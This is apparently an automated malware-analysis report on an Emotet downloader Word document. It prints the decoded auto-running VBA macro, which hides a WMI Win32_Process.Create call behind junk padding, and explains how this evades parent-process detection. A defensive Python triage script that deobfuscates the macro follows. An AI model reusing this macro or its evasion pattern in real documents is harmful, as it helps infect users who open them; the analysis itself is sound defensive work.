Verdict: MALICIOUS (risk score 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1204.002 User Execution: Malicious File
The sample carries a VBA project whose ThisDocument module defines an `autoopen` subroutine, so the macro runs as soon as the document is opened with macros enabled, the standard Emotet maldoc pattern. The visible source is padded with junk `Debug.Print` string concatenations; the working logic sits in a helper function that assembles the moniker "winmgmts:Win32_Process" from two fragments ("win" + "mgmts:Win32_Process"), obtains the WMI object and calls `.Create` on it, passing a command line built by concatenating the text of three MSForms ComboBox controls on the document. Spawning via WMI rather than `Shell` means the child is launched by WmiPrvSE.exe instead of appearing as a direct child of WINWORD.EXE, which defeats naive parent-process detection. The command line itself lives in the form control data, not in the macro text, so it is not visible in this source extraction; given the ClamAV signature (Doc.Downloader.Emotet-10001946-0) and the family's behaviour it is most likely a downloader for the second-stage payload.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-10001946-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that a VBA project was in fact recovered from this sample (see Extracted artifacts), so read this as the rule's generic description rather than a statement about this file.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI, present in any Office document that contains drawing objects; it is not a network indicator and should not be blocked or hunted on.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5615 bytes | b71b3d77a6220722fc26f734d9ded2e4f82f5b95caabc783778088f61797d65d |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "noh0obR0, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "HU10X6p, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "E1jcPr_A, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
Debug.Print "jmKnYHL" + ("uiTwOU8l") + "QIPkN3" + "N9wJnbu" + "P71qO6U" + ("TPrk1u" + ("RVbB9wpv"))
Debug.Print "Ku33Dr6" + ("EjFO6VI") + "jqHD6wH" + "UVKL6S" + ("aOjM_p" + "HSOHjq")
NMfRGX7
Debug.Print "UKDl4X" + ("pn6wvozI") + "nR3EZj" + "z24ljHc" + "qoh4JaWD" + ("rrr8tJG" + ("TTwhwb"))
Debug.Print "vNDzV9" + ("ZOUl2fBc") + "nP5Jbc0V" + "DGwbtQb" + ("cftz0O7z" + "tSTWzr")
End Sub
Attribute VB_Name = "h_64hH"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zZKM3BS"
Attribute VB_Name = "incpbD"
Attribute VB_Name = "wWuAHR"
Attribute VB_Name = "lmbusKmi"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "BLz5Kr7"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "pfm9cj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "T4vDT7z_"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "SKlzDf"
Function NMfRGX7()
sd5pqz = ThisDocument.HU10X6p + ThisDocument.E1jcPr_A + ThisDocument.noh0obR0
Debug.Print "jh4rtV" + ("KK2TlFc") + "sjG7oERD" + "uQEPz4mi" + "tlhVsWwX" + ("Fh5ui5s" + ("XlnFd6"))
Debug.Print "wDa0hI" + ("N0vNRR") + "DwWWUr" + "Qj3HPf" + ("RO3Takj" + "kR69Fv")
D1r1vWXk = "win"
Debug.Print "Flhik1Kz" + ("WPjL8R") + "cmzbnjp" + "l5AkBE8" + "z5TjQz" + ("ZTjZ9P" + ("iF0p09"))
Debug.Print "Ld7JcaLm" + ("QpGBV0bi") + "OMvpjVW" + "iR_EkRw5" + ("DH8iP7wH" + "zOi4ddBs")
vP_wVGa0 = D1r1vWXk + "mgmts:Win32_Process"
Debug.Print "S_pwpM_b" + ("YVMBUBT") + "fozBEw" + "S944Fc" + "wojJYLJ" + ("XTf16HDj" + ("Mh9kAj"))
Debug.Print "YmjX4fX" + ("mhuaibQ") + "ibc1zXq" + "G9Ejlci" + ("KEbAdjvT" + "nvFs8i0")
iELjniBd(vP_wVGa0).Create# sd5pqz, oMsmBPb, qAii6Xd, zS3zpE
Debug.Print "KMlu3p" + ("hmzkmtf") + "FjsMrtr" + "M_rCYKzk" + "pzY46c" + ("ankdoH8" + ("z3jd6t"))
Debug.Print "UpmNmwB" + ("Wktnwu") + "JYTwVk" + "v1sq34Fa" + ("obR5zi7" + "SqnIH3Pu")
End Function
Attribute VB_Name = "CFjOr0U"
Function qAii6Xd()
Debug.Print "VuiVwQS6" + ("bwut3711") + "Qq02BT" + "FzkfBb" + "rHD5XY" + ("TCbf6A" + ("P6XuwrU"))
Debug.Print "IzSHCuS_" + ("lzhw8T") + "w40NGOJ" + "D_WIwj" + ("iE8VSI" + "v2owIb")
D1r1vWXk = "win"
Debug.Print "sU6frda" + ("V4BcRIU") + "znA39Q" + "FEaiXmz" + "wUZSfF" + ("E58iHN" + ("z5dp0Xp"))
Debug.Print "TWOECQ" + ("JK_C8fi") + "tWQ902K" + "lWJHlqH" + ("mwMDou" + "CPkAY7rY")
vP_wVGa0 = D1r1vWXk + "mgmts:Win32_Process" + "Startup"
Debug.Print "SsIwLM" + ("Qd71Kn") + "QWnnwJT" + "QUT8uZzk" + "amQ
```

... (truncated)
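To make the Malware Insights summary and the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic concrete, here is an added Python triage helper written for this page (it is not the analyzer's code and not part of oletools). It folds VBA line continuations, drops the `Debug.Print` padding, statically concatenates the split string fragments, and pairs the auto-exec entry point with the execution sink, which is exactly the "auto-execution token together with execution tokens" rule. `SAMPLE_VBA` is a constructed, shortened version of the macros.bas listing above; `fold`, `triage`, the `<ctrl:NAME>` placeholder convention and the token lists are this example's own choices. It matches `.Create` as a substring so the `#` suffix on `Create#` does not hide the call, and it marks ComboBox-sourced operands as unknown rather than guessing their contents.

```python
"""Static triage of a junk-padded VBA macro (added example; not the analyzer's code)."""
import json
import re

# Constructed sample, trimmed from the macros.bas listing on this page: same autoopen
# entry point, Debug.Print padding, the split "win" + "mgmts:Win32_Process" string and
# the Win32_Process.Create call whose command line comes from three ComboBox controls.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Attribute VB_Control = "noh0obR0, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "HU10X6p, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "E1jcPr_A, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
Debug.Print "jmKnYHL" + ("uiTwOU8l") + "QIPkN3" + ("TPrk1u" + ("RVbB9wpv"))
NMfRGX7
Debug.Print "Ku33Dr6" + ("EjFO6VI") + "jqHD6wH"
End Sub
Attribute VB_Name = "SKlzDf"
Function NMfRGX7()
sd5pqz = ThisDocument.HU10X6p + ThisDocument.E1jcPr_A + ThisDocument.noh0obR0
Debug.Print "jh4rtV" + ("KK2TlFc") + "sjG7oERD"
D1r1vWXk = "win"
vP_wVGa0 = D1r1vWXk + "mgmts:Win32_Process"
iELjniBd(vP_wVGa0).Create# sd5pqz, oMsmBPb, qAii6Xd, zS3zpE
End Function
'''

# Auto-execution entry points and execution sinks, paired the way the
# OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic describes. Both lists are this example's own.
AUTOEXEC = re.compile(r"Auto_?Open|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open", re.I)
SINK_TOKENS = ("Shell", "CreateObject", "GetObject", "winmgmts:", "Win32_Process", ".Create", "URLDownloadToFile")

CONTROL = re.compile(r'^Attribute\s+VB_Control\s*=\s*"([A-Za-z_]\w*)', re.I)
PROC = re.compile(r"^(?:(?:Public|Private)\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)", re.I)
ASSIGN = re.compile(r"^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$", re.I)
# A string literal ("" is an escaped quote), a dotted identifier, or a concatenation operator.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_][\w.]*)|([+&])')
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")


def join_continuations(src):
    """Fold VBA ' _' line continuations so 'Sub _ / autoopen( _ / )' becomes one line."""
    return re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src)


def fold(expr, env, controls):
    """Statically evaluate a pure concatenation of literals and already-known variables.

    References to form controls (ThisDocument.<ComboBox>) become <ctrl:NAME> placeholders,
    because their text lives in the form data, not in the macro source. Returns None when
    any operand (a function call, an unknown variable) is not statically known."""
    parts = []
    for m in TOKEN.finditer(expr):
        lit, ident = m.group(1), m.group(2)
        if lit is not None:
            parts.append(lit.replace('""', '"'))
        elif ident is not None:
            leaf = ident.rsplit(".", 1)[-1]
            if ident in env:
                parts.append(env[ident])
            elif leaf in controls:
                parts.append("<ctrl:%s>" % leaf)
            else:
                return None
        # '+' and '&' carry no value; parentheses and whitespace are not tokens at all.
    return "".join(parts)


def deobfuscate(line, env):
    """Replace identifiers whose value is statically known with that value, quoted."""
    return IDENT.sub(lambda m: '"%s"' % env[m.group(0)] if m.group(0) in env else m.group(0), line)


def triage(src):
    """Return entry points, form controls, resolved strings and execution sinks."""
    env, controls, entry_points, sinks, junk = {}, [], [], [], 0
    for raw in join_continuations(src).splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.lower().startswith("debug.print"):
            junk += 1  # the padding that inflates this family's macros
            continue
        m = CONTROL.match(line)
        if m:
            controls.append(m.group(1))
            continue
        if line.lower().startswith("attribute "):
            continue
        m = PROC.match(line)
        if m:
            if AUTOEXEC.fullmatch(m.group(1)):
                entry_points.append(m.group(1))
            continue
        m = ASSIGN.match(line)
        if m:
            value = fold(m.group(2), env, controls)
            if value is not None:
                env[m.group(1)] = value
            continue
        resolved = deobfuscate(line, env)
        hits = [t for t in SINK_TOKENS if t.lower() in resolved.lower()]
        if hits:
            sinks.append({"line": resolved, "tokens": hits})
    return {
        "entry_points": entry_points,
        "controls": controls,
        "strings": env,
        "sinks": sinks,
        "junk_lines": junk,
        "autoexec_with_exec": bool(entry_points) and bool(sinks),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Run against the sample, the report resolves `vP_wVGa0` to `winmgmts:Win32_Process`, shows the `.Create` call with its command-line argument rendered as the three ComboBox placeholders, and sets `autoexec_with_exec`. To use it on the real artifact, feed it the text of `macros.bas` (for example the output of `olevba --decode`); the placeholders tell you to pull the ComboBox text from the form stream rather than expect the command line in the source.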